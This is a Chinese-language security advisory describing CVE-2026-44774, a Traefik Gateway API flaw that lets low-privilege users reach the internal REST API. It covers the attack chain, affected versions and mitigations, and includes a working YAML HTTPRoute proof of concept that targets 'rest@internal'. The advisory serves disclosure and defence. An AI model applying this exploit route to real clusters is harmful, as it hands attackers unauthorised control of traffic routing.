CVE-2026-44774 CVSS 9.9 严重

CVE-2026-44774 Traefik权限提升漏洞

披露日期: 2026-05-15

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-44774

漏洞类型

权限提升

CVSS评分

9.9 严重

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Traefik

漏洞概述

Traefik Kubernetes Gateway API提供程序存在权限绕过漏洞。具备HTTPRoute创建权限的攻击者可利用`rest@internal`后端引用绕过安全限制，访问内部REST API。这导致低权限用户获得动态配置写入权限，可未授权修改路由和服务，严重影响系统安全。

技术细节

该漏洞源于Traefik的Kubernetes Gateway API提供程序对后端引用的验证逻辑存在缺陷。在受影响版本中，系统错误地接受任何以`@internal`结尾的TraefikService引用。攻击者只需具备HTTPRoute创建权限（通常属于低权限），即可构造恶意路由，将流量导向`rest@internal`。此举成功绕过了`providers.rest.insecure=false`的配置限制，暴露了本应受保护的内部REST处理程序。一旦建立该通道，攻击者便能够向Traefik的动态配置端点发送请求，获得对配置的完全写入权限。这允许攻击者添加、修改或删除路由规则和服务定义，从而接管负载均衡器的流量转发。这种未授权的配置变更可能导致服务中断、敏感数据泄露，甚至作为跳板进一步攻击后端服务，造成严重的安全事故。

攻击链分析

STEP 1

侦察

攻击者确认目标环境使用受影响版本的Traefik且启用了Gateway API和REST Provider。

STEP 2

权限获取

攻击者获得Kubernetes集群中创建HTTPRoute资源的低权限。

STEP 3

漏洞利用

攻击者部署特制的HTTPRoute，将后端指向`rest@internal`服务。

STEP 4

绕过防御

Traefik接受该路由，绕过了`providers.rest.insecure=false`的安全检查，暴露了REST API。

STEP 5

配置篡改

攻击者通过该路由向Traefik的REST API发送恶意配置数据（如添加新的后端路由）。

STEP 6

系统接管

Traefik加载新配置，攻击者获得流量控制权，实现未授权访问或进一步攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Malicious HTTPRoute to exploit CVE-2026-44774
# This route forwards traffic to the internal REST API handler,
# bypassing the insecure check.
apiVersion: gateway.networking.k8s.io/v1
kind: HTTPRoute
metadata:
  name: exploit-rest-access
  namespace: default
spec:
  parentRefs:
  - name: shared-gateway # Target a vulnerable gateway
  hostnames:
  - "malicious.example.com"
  rules:
  - matches:
    - path:
        type: PathPrefix
        value: /api
    backendRefs:
    # Vulnerability: Traefik accepts references ending in @internal
    - name: rest@internal
      kind: TraefikService

影响范围

Traefik < 2.11.46

Traefik < 3.6.17

Traefik < 3.7.1

防御指南

临时缓解措施

建议立即评估集群权限，撤回非必要账户的HTTPRoute创建权限。若无法立即升级，应考虑在网络层面隔离Traefik控制平面，或暂时禁用REST Provider功能，直到完成补丁更新。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表